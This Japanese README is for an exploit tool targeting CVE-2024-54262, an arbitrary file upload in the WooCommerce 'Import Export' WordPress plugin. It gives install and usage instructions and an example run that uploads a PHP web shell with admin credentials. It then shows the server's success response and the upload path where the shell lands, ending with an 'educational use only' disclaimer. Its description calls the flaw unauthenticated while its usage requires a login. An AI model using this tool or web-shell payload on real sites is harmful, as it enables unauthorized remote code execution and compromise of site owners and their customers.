
CVE-2024-54262 のエクスプロイト: Import Export for WooCommerce における任意ファイルアップロード
CVE-2024-54262 のエクスプロイト: Import Export for WooCommerce の任意ファイルアップロード
このスクリプトは、WordPress プラグイン「Import Export for WooCommerce」の脆弱性を悪用します。この脆弱性により、認証されていないユーザーが任意のファイルをアップロードでき、潜在的なリモートコード実行(RCE)につながる可能性があります。
requestsargparse依存関係をインストールするには:
pip install requests
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -un USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--command COMMAND, -c COMMAND
PHP shell code to upload
CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"
{
"status": true,
"code": 104,
"message": "Success",
"data": {
"file_name": "import_manual_1737090262.php",
"total_requests": 1,
"import_columns": "all",
"product_search_type": "SKU",
"product_operation": "create_new_update_existing",
"field_separator": ","
}
}
import_manual_1737090262.phpwp-content/uploads/import-export-for-woocommerce/product/このツールは教育目的のみで提供されています。作者は、このスクリプトの誤用または損害について一切の責任を負いません。明示的な許可なくシステムへの不正アクセスまたは悪用を行うことは、違法かつ非倫理的です。